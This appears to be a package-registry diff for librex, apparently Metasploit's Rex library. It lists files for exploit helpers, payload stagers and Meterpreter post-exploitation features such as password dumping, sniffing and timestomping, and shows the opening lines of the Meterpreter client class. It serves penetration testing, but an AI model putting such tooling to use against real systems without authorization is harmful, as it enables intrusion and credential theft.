librex 0.0.20 → 0.0.21

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (435) hide show
  1. data/Rakefile +1 -0
  2. data/lib/rex/LICENSE +29 -0
  3. data/lib/rex/arch.rb +103 -0
  4. data/lib/rex/arch/sparc.rb +75 -0
  5. data/lib/rex/arch/sparc.rb.ut.rb +18 -0
  6. data/lib/rex/arch/x86.rb +513 -0
  7. data/lib/rex/arch/x86.rb.ut.rb +93 -0
  8. data/lib/rex/assembly/nasm.rb +104 -0
  9. data/lib/rex/assembly/nasm.rb.ut.rb +22 -0
  10. data/lib/rex/codepage.map +104 -0
  11. data/lib/rex/compat.rb +311 -0
  12. data/lib/rex/constants.rb +113 -0
  13. data/lib/rex/elfparsey.rb +11 -0
  14. data/lib/rex/elfparsey/elf.rb +123 -0
  15. data/lib/rex/elfparsey/elfbase.rb +258 -0
  16. data/lib/rex/elfparsey/exceptions.rb +27 -0
  17. data/lib/rex/elfscan.rb +12 -0
  18. data/lib/rex/elfscan/scanner.rb +207 -0
  19. data/lib/rex/elfscan/search.rb +46 -0
  20. data/lib/rex/encoder/alpha2.rb +31 -0
  21. data/lib/rex/encoder/alpha2/alpha_mixed.rb +68 -0
  22. data/lib/rex/encoder/alpha2/alpha_upper.rb +79 -0
  23. data/lib/rex/encoder/alpha2/generic.rb +114 -0
  24. data/lib/rex/encoder/alpha2/unicode_mixed.rb +117 -0
  25. data/lib/rex/encoder/alpha2/unicode_upper.rb +129 -0
  26. data/lib/rex/encoder/ndr.rb +89 -0
  27. data/lib/rex/encoder/ndr.rb.ut.rb +44 -0
  28. data/lib/rex/encoder/nonalpha.rb +61 -0
  29. data/lib/rex/encoder/nonupper.rb +64 -0
  30. data/lib/rex/encoder/xdr.rb +106 -0
  31. data/lib/rex/encoder/xdr.rb.ut.rb +29 -0
  32. data/lib/rex/encoder/xor.rb +69 -0
  33. data/lib/rex/encoder/xor/dword.rb +13 -0
  34. data/lib/rex/encoder/xor/dword_additive.rb +13 -0
  35. data/lib/rex/encoders/xor_dword.rb +35 -0
  36. data/lib/rex/encoders/xor_dword_additive.rb +53 -0
  37. data/lib/rex/encoders/xor_dword_additive.rb.ut.rb +12 -0
  38. data/lib/rex/encoding/xor.rb +20 -0
  39. data/lib/rex/encoding/xor.rb.ts.rb +14 -0
  40. data/lib/rex/encoding/xor/byte.rb +15 -0
  41. data/lib/rex/encoding/xor/byte.rb.ut.rb +21 -0
  42. data/lib/rex/encoding/xor/dword.rb +21 -0
  43. data/lib/rex/encoding/xor/dword.rb.ut.rb +15 -0
  44. data/lib/rex/encoding/xor/dword_additive.rb +92 -0
  45. data/lib/rex/encoding/xor/dword_additive.rb.ut.rb +15 -0
  46. data/lib/rex/encoding/xor/exceptions.rb +17 -0
  47. data/lib/rex/encoding/xor/generic.rb +146 -0
  48. data/lib/rex/encoding/xor/generic.rb.ut.rb +120 -0
  49. data/lib/rex/encoding/xor/qword.rb +15 -0
  50. data/lib/rex/encoding/xor/word.rb +21 -0
  51. data/lib/rex/encoding/xor/word.rb.ut.rb +13 -0
  52. data/lib/rex/exceptions.rb +275 -0
  53. data/lib/rex/exceptions.rb.ut.rb +44 -0
  54. data/lib/rex/exploitation/cmdstager.rb +9 -0
  55. data/lib/rex/exploitation/cmdstager/base.rb +175 -0
  56. data/lib/rex/exploitation/cmdstager/debug_asm.rb +142 -0
  57. data/lib/rex/exploitation/cmdstager/debug_write.rb +136 -0
  58. data/lib/rex/exploitation/cmdstager/tftp.rb +63 -0
  59. data/lib/rex/exploitation/cmdstager/vbs.rb +128 -0
  60. data/lib/rex/exploitation/egghunter.rb +277 -0
  61. data/lib/rex/exploitation/egghunter.rb.ut.rb +25 -0
  62. data/lib/rex/exploitation/encryptjs.rb +77 -0
  63. data/lib/rex/exploitation/heaplib.js.b64 +331 -0
  64. data/lib/rex/exploitation/heaplib.rb +94 -0
  65. data/lib/rex/exploitation/javascriptosdetect.rb +897 -0
  66. data/lib/rex/exploitation/obfuscatejs.rb +335 -0
  67. data/lib/rex/exploitation/omelet.rb +320 -0
  68. data/lib/rex/exploitation/omelet.rb.ut.rb +13 -0
  69. data/lib/rex/exploitation/opcodedb.rb +818 -0
  70. data/lib/rex/exploitation/opcodedb.rb.ut.rb +279 -0
  71. data/lib/rex/exploitation/seh.rb +92 -0
  72. data/lib/rex/exploitation/seh.rb.ut.rb +19 -0
  73. data/lib/rex/file.rb +112 -0
  74. data/lib/rex/file.rb.ut.rb +16 -0
  75. data/lib/rex/image_source.rb +12 -0
  76. data/lib/rex/image_source/disk.rb +60 -0
  77. data/lib/rex/image_source/image_source.rb +46 -0
  78. data/lib/rex/image_source/memory.rb +37 -0
  79. data/lib/rex/io/bidirectional_pipe.rb +157 -0
  80. data/lib/rex/io/datagram_abstraction.rb +35 -0
  81. data/lib/rex/io/ring_buffer.rb +364 -0
  82. data/lib/rex/io/stream.rb +319 -0
  83. data/lib/rex/io/stream_abstraction.rb +197 -0
  84. data/lib/rex/io/stream_server.rb +211 -0
  85. data/lib/rex/job_container.rb +187 -0
  86. data/lib/rex/logging.rb +4 -0
  87. data/lib/rex/logging/log_dispatcher.rb +179 -0
  88. data/lib/rex/logging/log_sink.rb +42 -0
  89. data/lib/rex/logging/sinks/flatfile.rb +55 -0
  90. data/lib/rex/logging/sinks/stderr.rb +43 -0
  91. data/lib/rex/machparsey.rb +9 -0
  92. data/lib/rex/machparsey/exceptions.rb +34 -0
  93. data/lib/rex/machparsey/mach.rb +209 -0
  94. data/lib/rex/machparsey/machbase.rb +408 -0
  95. data/lib/rex/machscan.rb +9 -0
  96. data/lib/rex/machscan/scanner.rb +217 -0
  97. data/lib/rex/mime.rb +9 -0
  98. data/lib/rex/mime/header.rb +77 -0
  99. data/lib/rex/mime/message.rb +144 -0
  100. data/lib/rex/mime/part.rb +20 -0
  101. data/lib/rex/nop/opty2.rb +108 -0
  102. data/lib/rex/nop/opty2.rb.ut.rb +23 -0
  103. data/lib/rex/nop/opty2_tables.rb +300 -0
  104. data/lib/rex/ole.rb +205 -0
  105. data/lib/rex/ole/clsid.rb +47 -0
  106. data/lib/rex/ole/difat.rb +141 -0
  107. data/lib/rex/ole/directory.rb +231 -0
  108. data/lib/rex/ole/direntry.rb +240 -0
  109. data/lib/rex/ole/docs/dependencies.txt +8 -0
  110. data/lib/rex/ole/docs/references.txt +1 -0
  111. data/lib/rex/ole/fat.rb +99 -0
  112. data/lib/rex/ole/header.rb +204 -0
  113. data/lib/rex/ole/minifat.rb +77 -0
  114. data/lib/rex/ole/propset.rb +144 -0
  115. data/lib/rex/ole/samples/create_ole.rb +27 -0
  116. data/lib/rex/ole/samples/dir.rb +35 -0
  117. data/lib/rex/ole/samples/dump_stream.rb +34 -0
  118. data/lib/rex/ole/samples/ole_info.rb +23 -0
  119. data/lib/rex/ole/storage.rb +395 -0
  120. data/lib/rex/ole/stream.rb +53 -0
  121. data/lib/rex/ole/substorage.rb +49 -0
  122. data/lib/rex/ole/util.rb +157 -0
  123. data/lib/rex/parser/arguments.rb +97 -0
  124. data/lib/rex/parser/arguments.rb.ut.rb +67 -0
  125. data/lib/rex/parser/ini.rb +185 -0
  126. data/lib/rex/parser/ini.rb.ut.rb +29 -0
  127. data/lib/rex/parser/ip360_aspl_xml.rb +102 -0
  128. data/lib/rex/parser/ip360_xml.rb +97 -0
  129. data/lib/rex/parser/nessus_xml.rb +118 -0
  130. data/lib/rex/parser/netsparker_xml.rb +94 -0
  131. data/lib/rex/parser/nexpose_xml.rb +136 -0
  132. data/lib/rex/parser/nmap_xml.rb +137 -0
  133. data/lib/rex/parser/retina_xml.rb +109 -0
  134. data/lib/rex/payloads.rb +1 -0
  135. data/lib/rex/payloads/win32.rb +2 -0
  136. data/lib/rex/payloads/win32/common.rb +26 -0
  137. data/lib/rex/payloads/win32/kernel.rb +53 -0
  138. data/lib/rex/payloads/win32/kernel/common.rb +54 -0
  139. data/lib/rex/payloads/win32/kernel/migration.rb +12 -0
  140. data/lib/rex/payloads/win32/kernel/recovery.rb +50 -0
  141. data/lib/rex/payloads/win32/kernel/stager.rb +194 -0
  142. data/lib/rex/peparsey.rb +12 -0
  143. data/lib/rex/peparsey/exceptions.rb +32 -0
  144. data/lib/rex/peparsey/pe.rb +212 -0
  145. data/lib/rex/peparsey/pe_memdump.rb +63 -0
  146. data/lib/rex/peparsey/pebase.rb +1680 -0
  147. data/lib/rex/peparsey/section.rb +136 -0
  148. data/lib/rex/pescan.rb +13 -0
  149. data/lib/rex/pescan/analyze.rb +309 -0
  150. data/lib/rex/pescan/scanner.rb +206 -0
  151. data/lib/rex/pescan/search.rb +56 -0
  152. data/lib/rex/platforms.rb +1 -0
  153. data/lib/rex/platforms/windows.rb +51 -0
  154. data/lib/rex/poly.rb +132 -0
  155. data/lib/rex/poly/block.rb +477 -0
  156. data/lib/rex/poly/register.rb +100 -0
  157. data/lib/rex/poly/register/x86.rb +40 -0
  158. data/lib/rex/post.rb +8 -0
  159. data/lib/rex/post/dir.rb +51 -0
  160. data/lib/rex/post/file.rb +172 -0
  161. data/lib/rex/post/file_stat.rb +220 -0
  162. data/lib/rex/post/gen.pl +13 -0
  163. data/lib/rex/post/io.rb +182 -0
  164. data/lib/rex/post/meterpreter.rb +4 -0
  165. data/lib/rex/post/meterpreter/channel.rb +445 -0
  166. data/lib/rex/post/meterpreter/channel_container.rb +54 -0
  167. data/lib/rex/post/meterpreter/channels/pool.rb +160 -0
  168. data/lib/rex/post/meterpreter/channels/pools/file.rb +62 -0
  169. data/lib/rex/post/meterpreter/channels/pools/stream_pool.rb +103 -0
  170. data/lib/rex/post/meterpreter/channels/stream.rb +87 -0
  171. data/lib/rex/post/meterpreter/client.rb +364 -0
  172. data/lib/rex/post/meterpreter/client_core.rb +274 -0
  173. data/lib/rex/post/meterpreter/dependencies.rb +3 -0
  174. data/lib/rex/post/meterpreter/extension.rb +32 -0
  175. data/lib/rex/post/meterpreter/extensions/espia/espia.rb +58 -0
  176. data/lib/rex/post/meterpreter/extensions/espia/tlv.rb +16 -0
  177. data/lib/rex/post/meterpreter/extensions/incognito/incognito.rb +94 -0
  178. data/lib/rex/post/meterpreter/extensions/incognito/tlv.rb +21 -0
  179. data/lib/rex/post/meterpreter/extensions/networkpug/networkpug.rb +57 -0
  180. data/lib/rex/post/meterpreter/extensions/networkpug/tlv.rb +15 -0
  181. data/lib/rex/post/meterpreter/extensions/priv/fs.rb +118 -0
  182. data/lib/rex/post/meterpreter/extensions/priv/passwd.rb +61 -0
  183. data/lib/rex/post/meterpreter/extensions/priv/priv.rb +111 -0
  184. data/lib/rex/post/meterpreter/extensions/priv/tlv.rb +28 -0
  185. data/lib/rex/post/meterpreter/extensions/sniffer/sniffer.rb +101 -0
  186. data/lib/rex/post/meterpreter/extensions/sniffer/tlv.rb +26 -0
  187. data/lib/rex/post/meterpreter/extensions/stdapi/constants.rb +333 -0
  188. data/lib/rex/post/meterpreter/extensions/stdapi/fs/dir.rb +282 -0
  189. data/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb +266 -0
  190. data/lib/rex/post/meterpreter/extensions/stdapi/fs/file_stat.rb +103 -0
  191. data/lib/rex/post/meterpreter/extensions/stdapi/fs/io.rb +48 -0
  192. data/lib/rex/post/meterpreter/extensions/stdapi/net/config.rb +144 -0
  193. data/lib/rex/post/meterpreter/extensions/stdapi/net/interface.rb +73 -0
  194. data/lib/rex/post/meterpreter/extensions/stdapi/net/route.rb +56 -0
  195. data/lib/rex/post/meterpreter/extensions/stdapi/net/socket.rb +137 -0
  196. data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_client_channel.rb +180 -0
  197. data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_server_channel.rb +167 -0
  198. data/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/udp_channel.rb +208 -0
  199. data/lib/rex/post/meterpreter/extensions/stdapi/railgun.rb.ts.rb +6 -0
  200. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/api_constants.rb +38106 -0
  201. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/api_constants.rb.ut.rb +31 -0
  202. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/buffer_item.rb +47 -0
  203. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/buffer_item.rb.ut.rb +36 -0
  204. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_advapi32.rb +1818 -0
  205. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_iphlpapi.rb +96 -0
  206. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_kernel32.rb +3848 -0
  207. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_netapi32.rb +26 -0
  208. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_ntdll.rb +153 -0
  209. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_shell32.rb +21 -0
  210. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_user32.rb +3169 -0
  211. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/def/def_ws2_32.rb +599 -0
  212. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll.rb +318 -0
  213. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_function.rb +100 -0
  214. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_function.rb.ut.rb +42 -0
  215. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_helper.rb +148 -0
  216. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/dll_helper.rb.ut.rb +127 -0
  217. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/multicall.rb +309 -0
  218. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/railgun.rb +204 -0
  219. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/tlv.rb +51 -0
  220. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/util.rb +630 -0
  221. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager.rb +75 -0
  222. data/lib/rex/post/meterpreter/extensions/stdapi/railgun/win_const_manager.rb.ut.rb +103 -0
  223. data/lib/rex/post/meterpreter/extensions/stdapi/stdapi.rb +149 -0
  224. data/lib/rex/post/meterpreter/extensions/stdapi/sys/config.rb +97 -0
  225. data/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log.rb +192 -0
  226. data/lib/rex/post/meterpreter/extensions/stdapi/sys/event_log_subsystem/event_record.rb +41 -0
  227. data/lib/rex/post/meterpreter/extensions/stdapi/sys/power.rb +61 -0
  228. data/lib/rex/post/meterpreter/extensions/stdapi/sys/process.rb +370 -0
  229. data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/image.rb +129 -0
  230. data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/io.rb +55 -0
  231. data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/memory.rb +336 -0
  232. data/lib/rex/post/meterpreter/extensions/stdapi/sys/process_subsystem/thread.rb +141 -0
  233. data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb +279 -0
  234. data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_key.rb +193 -0
  235. data/lib/rex/post/meterpreter/extensions/stdapi/sys/registry_subsystem/registry_value.rb +102 -0
  236. data/lib/rex/post/meterpreter/extensions/stdapi/sys/thread.rb +180 -0
  237. data/lib/rex/post/meterpreter/extensions/stdapi/tlv.rb +211 -0
  238. data/lib/rex/post/meterpreter/extensions/stdapi/ui.rb +227 -0
  239. data/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb +63 -0
  240. data/lib/rex/post/meterpreter/inbound_packet_handler.rb +30 -0
  241. data/lib/rex/post/meterpreter/object_aliases.rb +83 -0
  242. data/lib/rex/post/meterpreter/packet.rb +688 -0
  243. data/lib/rex/post/meterpreter/packet_dispatcher.rb +431 -0
  244. data/lib/rex/post/meterpreter/packet_parser.rb +94 -0
  245. data/lib/rex/post/meterpreter/packet_response_waiter.rb +83 -0
  246. data/lib/rex/post/meterpreter/ui/console.rb +137 -0
  247. data/lib/rex/post/meterpreter/ui/console/command_dispatcher.rb +62 -0
  248. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb +730 -0
  249. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/espia.rb +108 -0
  250. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/incognito.rb +241 -0
  251. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/networkpug.rb +231 -0
  252. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv.rb +61 -0
  253. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/elevate.rb +98 -0
  254. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/passwd.rb +51 -0
  255. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/priv/timestomp.rb +132 -0
  256. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/sniffer.rb +187 -0
  257. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi.rb +65 -0
  258. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb +442 -0
  259. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/net.rb +298 -0
  260. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb +486 -0
  261. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/ui.rb +315 -0
  262. data/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb +157 -0
  263. data/lib/rex/post/meterpreter/ui/console/interactive_channel.rb +95 -0
  264. data/lib/rex/post/permission.rb +26 -0
  265. data/lib/rex/post/process.rb +57 -0
  266. data/lib/rex/post/thread.rb +57 -0
  267. data/lib/rex/post/ui.rb +52 -0
  268. data/lib/rex/proto.rb +13 -0
  269. data/lib/rex/proto.rb.ts.rb +8 -0
  270. data/lib/rex/proto/dcerpc.rb +6 -0
  271. data/lib/rex/proto/dcerpc.rb.ts.rb +9 -0
  272. data/lib/rex/proto/dcerpc/client.rb +361 -0
  273. data/lib/rex/proto/dcerpc/client.rb.ut.rb +491 -0
  274. data/lib/rex/proto/dcerpc/exceptions.rb +150 -0
  275. data/lib/rex/proto/dcerpc/handle.rb +47 -0
  276. data/lib/rex/proto/dcerpc/handle.rb.ut.rb +85 -0
  277. data/lib/rex/proto/dcerpc/ndr.rb +72 -0
  278. data/lib/rex/proto/dcerpc/ndr.rb.ut.rb +41 -0
  279. data/lib/rex/proto/dcerpc/packet.rb +253 -0
  280. data/lib/rex/proto/dcerpc/packet.rb.ut.rb +56 -0
  281. data/lib/rex/proto/dcerpc/response.rb +187 -0
  282. data/lib/rex/proto/dcerpc/response.rb.ut.rb +15 -0
  283. data/lib/rex/proto/dcerpc/uuid.rb +84 -0
  284. data/lib/rex/proto/dcerpc/uuid.rb.ut.rb +46 -0
  285. data/lib/rex/proto/dhcp.rb +7 -0
  286. data/lib/rex/proto/dhcp/constants.rb +33 -0
  287. data/lib/rex/proto/dhcp/server.rb +292 -0
  288. data/lib/rex/proto/drda.rb +5 -0
  289. data/lib/rex/proto/drda.rb.ts.rb +17 -0
  290. data/lib/rex/proto/drda/constants.rb +49 -0
  291. data/lib/rex/proto/drda/constants.rb.ut.rb +23 -0
  292. data/lib/rex/proto/drda/packet.rb +252 -0
  293. data/lib/rex/proto/drda/packet.rb.ut.rb +109 -0
  294. data/lib/rex/proto/drda/utils.rb +123 -0
  295. data/lib/rex/proto/drda/utils.rb.ut.rb +84 -0
  296. data/lib/rex/proto/http.rb +5 -0
  297. data/lib/rex/proto/http.rb.ts.rb +12 -0
  298. data/lib/rex/proto/http/client.rb +821 -0
  299. data/lib/rex/proto/http/client.rb.ut.rb +95 -0
  300. data/lib/rex/proto/http/handler.rb +46 -0
  301. data/lib/rex/proto/http/handler/erb.rb +128 -0
  302. data/lib/rex/proto/http/handler/erb.rb.ut.rb +21 -0
  303. data/lib/rex/proto/http/handler/erb.rb.ut.rb.rhtml +1 -0
  304. data/lib/rex/proto/http/handler/proc.rb +60 -0
  305. data/lib/rex/proto/http/handler/proc.rb.ut.rb +24 -0
  306. data/lib/rex/proto/http/header.rb +161 -0
  307. data/lib/rex/proto/http/header.rb.ut.rb +46 -0
  308. data/lib/rex/proto/http/packet.rb +407 -0
  309. data/lib/rex/proto/http/packet.rb.ut.rb +165 -0
  310. data/lib/rex/proto/http/request.rb +356 -0
  311. data/lib/rex/proto/http/request.rb.ut.rb +214 -0
  312. data/lib/rex/proto/http/response.rb +90 -0
  313. data/lib/rex/proto/http/response.rb.ut.rb +149 -0
  314. data/lib/rex/proto/http/server.rb +369 -0
  315. data/lib/rex/proto/http/server.rb.ut.rb +79 -0
  316. data/lib/rex/proto/ntlm.rb +7 -0
  317. data/lib/rex/proto/ntlm.rb.ut.rb +177 -0
  318. data/lib/rex/proto/ntlm/base.rb +326 -0
  319. data/lib/rex/proto/ntlm/constants.rb +74 -0
  320. data/lib/rex/proto/ntlm/crypt.rb +415 -0
  321. data/lib/rex/proto/ntlm/exceptions.rb +16 -0
  322. data/lib/rex/proto/ntlm/message.rb +536 -0
  323. data/lib/rex/proto/ntlm/utils.rb +764 -0
  324. data/lib/rex/proto/proxy/socks4a.rb +440 -0
  325. data/lib/rex/proto/rfb.rb +19 -0
  326. data/lib/rex/proto/rfb.rb.ut.rb +37 -0
  327. data/lib/rex/proto/rfb/cipher.rb +84 -0
  328. data/lib/rex/proto/rfb/client.rb +207 -0
  329. data/lib/rex/proto/rfb/constants.rb +52 -0
  330. data/lib/rex/proto/smb.rb +7 -0
  331. data/lib/rex/proto/smb.rb.ts.rb +8 -0
  332. data/lib/rex/proto/smb/client.rb +1952 -0
  333. data/lib/rex/proto/smb/client.rb.ut.rb +223 -0
  334. data/lib/rex/proto/smb/constants.rb +1047 -0
  335. data/lib/rex/proto/smb/constants.rb.ut.rb +18 -0
  336. data/lib/rex/proto/smb/crypt.rb +36 -0
  337. data/lib/rex/proto/smb/evasions.rb +66 -0
  338. data/lib/rex/proto/smb/exceptions.rb +858 -0
  339. data/lib/rex/proto/smb/simpleclient.rb +306 -0
  340. data/lib/rex/proto/smb/simpleclient.rb.ut.rb +128 -0
  341. data/lib/rex/proto/smb/utils.rb +103 -0
  342. data/lib/rex/proto/smb/utils.rb.ut.rb +20 -0
  343. data/lib/rex/proto/sunrpc.rb +1 -0
  344. data/lib/rex/proto/sunrpc/client.rb +195 -0
  345. data/lib/rex/proto/tftp.rb +12 -0
  346. data/lib/rex/proto/tftp/constants.rb +39 -0
  347. data/lib/rex/proto/tftp/server.rb +497 -0
  348. data/lib/rex/proto/tftp/server.rb.ut.rb +28 -0
  349. data/lib/rex/script.rb +42 -0
  350. data/lib/rex/script/base.rb +59 -0
  351. data/lib/rex/script/meterpreter.rb +15 -0
  352. data/lib/rex/script/shell.rb +9 -0
  353. data/lib/rex/service.rb +48 -0
  354. data/lib/rex/service_manager.rb +141 -0
  355. data/lib/rex/service_manager.rb.ut.rb +32 -0
  356. data/lib/rex/services/local_relay.rb +423 -0
  357. data/lib/rex/socket.rb +684 -0
  358. data/lib/rex/socket.rb.ut.rb +107 -0
  359. data/lib/rex/socket/comm.rb +119 -0
  360. data/lib/rex/socket/comm/local.rb +412 -0
  361. data/lib/rex/socket/comm/local.rb.ut.rb +75 -0
  362. data/lib/rex/socket/ip.rb +130 -0
  363. data/lib/rex/socket/parameters.rb +345 -0
  364. data/lib/rex/socket/parameters.rb.ut.rb +51 -0
  365. data/lib/rex/socket/range_walker.rb +346 -0
  366. data/lib/rex/socket/range_walker.rb.ut.rb +55 -0
  367. data/lib/rex/socket/ssl_tcp.rb +184 -0
  368. data/lib/rex/socket/ssl_tcp.rb.ut.rb +39 -0
  369. data/lib/rex/socket/ssl_tcp_server.rb +122 -0
  370. data/lib/rex/socket/ssl_tcp_server.rb.ut.rb +61 -0
  371. data/lib/rex/socket/subnet_walker.rb +75 -0
  372. data/lib/rex/socket/subnet_walker.rb.ut.rb +28 -0
  373. data/lib/rex/socket/switch_board.rb +278 -0
  374. data/lib/rex/socket/switch_board.rb.ut.rb +52 -0
  375. data/lib/rex/socket/tcp.rb +76 -0
  376. data/lib/rex/socket/tcp.rb.ut.rb +64 -0
  377. data/lib/rex/socket/tcp_server.rb +66 -0
  378. data/lib/rex/socket/tcp_server.rb.ut.rb +44 -0
  379. data/lib/rex/socket/udp.rb +164 -0
  380. data/lib/rex/socket/udp.rb.ut.rb +44 -0
  381. data/lib/rex/struct2.rb +5 -0
  382. data/lib/rex/struct2/c_struct.rb +181 -0
  383. data/lib/rex/struct2/c_struct_template.rb +39 -0
  384. data/lib/rex/struct2/constant.rb +26 -0
  385. data/lib/rex/struct2/element.rb +44 -0
  386. data/lib/rex/struct2/generic.rb +73 -0
  387. data/lib/rex/struct2/restraint.rb +54 -0
  388. data/lib/rex/struct2/s_string.rb +72 -0
  389. data/lib/rex/struct2/s_struct.rb +111 -0
  390. data/lib/rex/sync.rb +6 -0
  391. data/lib/rex/sync/event.rb +94 -0
  392. data/lib/rex/sync/read_write_lock.rb +176 -0
  393. data/lib/rex/sync/ref.rb +57 -0
  394. data/lib/rex/sync/thread_safe.rb +82 -0
  395. data/lib/rex/test.rb +35 -0
  396. data/lib/rex/text.rb +1163 -0
  397. data/lib/rex/text.rb.ut.rb +190 -0
  398. data/lib/rex/thread_factory.rb +42 -0
  399. data/lib/rex/time.rb +65 -0
  400. data/lib/rex/transformer.rb +115 -0
  401. data/lib/rex/transformer.rb.ut.rb +38 -0
  402. data/lib/rex/ui.rb +21 -0
  403. data/lib/rex/ui/interactive.rb +298 -0
  404. data/lib/rex/ui/output.rb +78 -0
  405. data/lib/rex/ui/output/none.rb +18 -0
  406. data/lib/rex/ui/progress_tracker.rb +96 -0
  407. data/lib/rex/ui/subscriber.rb +149 -0
  408. data/lib/rex/ui/text/color.rb +97 -0
  409. data/lib/rex/ui/text/color.rb.ut.rb +18 -0
  410. data/lib/rex/ui/text/dispatcher_shell.rb +467 -0
  411. data/lib/rex/ui/text/input.rb +117 -0
  412. data/lib/rex/ui/text/input/buffer.rb +75 -0
  413. data/lib/rex/ui/text/input/readline.rb +129 -0
  414. data/lib/rex/ui/text/input/socket.rb +95 -0
  415. data/lib/rex/ui/text/input/stdio.rb +45 -0
  416. data/lib/rex/ui/text/irb_shell.rb +57 -0
  417. data/lib/rex/ui/text/output.rb +80 -0
  418. data/lib/rex/ui/text/output/buffer.rb +61 -0
  419. data/lib/rex/ui/text/output/file.rb +43 -0
  420. data/lib/rex/ui/text/output/socket.rb +43 -0
  421. data/lib/rex/ui/text/output/stdio.rb +40 -0
  422. data/lib/rex/ui/text/progress_tracker.rb +56 -0
  423. data/lib/rex/ui/text/progress_tracker.rb.ut.rb +34 -0
  424. data/lib/rex/ui/text/shell.rb +328 -0
  425. data/lib/rex/ui/text/table.rb +279 -0
  426. data/lib/rex/ui/text/table.rb.ut.rb +55 -0
  427. data/lib/rex/zip.rb +93 -0
  428. data/lib/rex/zip/archive.rb +184 -0
  429. data/lib/rex/zip/blocks.rb +182 -0
  430. data/lib/rex/zip/entry.rb +104 -0
  431. data/lib/rex/zip/samples/comment.rb +32 -0
  432. data/lib/rex/zip/samples/mkwar.rb +138 -0
  433. data/lib/rex/zip/samples/mkzip.rb +19 -0
  434. data/lib/rex/zip/samples/recursive.rb +58 -0
  435. metadata +434 -1
@@ -0,0 +1,364 @@
1
+ #!/usr/bin/env ruby
2
+
3
+ require 'socket'
4
+ require 'openssl'
5
+
6
+ require 'rex/script'
7
+ require 'rex/post/meterpreter/client_core'
8
+ require 'rex/post/meterpreter/channel'
9
+ require 'rex/post/meterpreter/channel_container'
10
+ require 'rex/post/meterpreter/dependencies'
11
+ require 'rex/post/meterpreter/object_aliases'
12
+ require 'rex/post/meterpreter/packet'
13
+ require 'rex/post/meterpreter/packet_parser'
14
+ require 'rex/post/meterpreter/packet_dispatcher'
15
+
16
+ module Rex
17
+ module Post
18
+ module Meterpreter
19
+
20
+ #
21
+ # Just to get it in there...
22
+ #
23
+ module Extensions
24
+ end
25
+
26
+ ###
27
+ #
28
+ # This class represents a logical meterpreter client class. This class
29
+ # provides an interface that is compatible with the Rex post-exploitation
30
+ # interface in terms of the feature set that it attempts to expose. This
31
+ # class is meant to drive a single meterpreter client session.
32
+ #
33
+ ###
34
+ class Client
35
+
36
+ include Rex::Post::Meterpreter::PacketDispatcher
37
+ include Rex::Post::Meterpreter::ChannelContainer
38
+
39
+ #
40
+ # Extension name to class hash.
41
+ #
42
+ @@ext_hash = {}
43
+
44
+ #
45
+ # Cached SSL certificate (required to scale)
46
+ #
47
+ @@ssl_ctx = nil
48
+
49
+ #
50
+ # Mutex to synchronize class-wide operations
51
+ #
52
+ @@ssl_mutex = ::Mutex.new
53
+
54
+ #
55
+ # Lookup the error that occurred
56
+ #
57
+ def self.lookup_error(code)
58
+ code
59
+ end
60
+
61
+ #
62
+ # Checks the extension hash to see if a class has already been associated
63
+ # with the supplied extension name.
64
+ #
65
+ def self.check_ext_hash(name)
66
+ @@ext_hash[name]
67
+ end
68
+
69
+ #
70
+ # Stores the name to class association for the supplied extension name.
71
+ #
72
+ def self.set_ext_hash(name, klass)
73
+ @@ext_hash[name] = klass
74
+ end
75
+
76
+ #
77
+ # Initializes the client context with the supplied socket through
78
+ # which communication with the server will be performed.
79
+ #
80
+ def initialize(sock,opts={})
81
+ init_meterpreter(sock, opts)
82
+ end
83
+
84
+ #
85
+ # Cleans up the meterpreter instance, terminating the dispatcher thread.
86
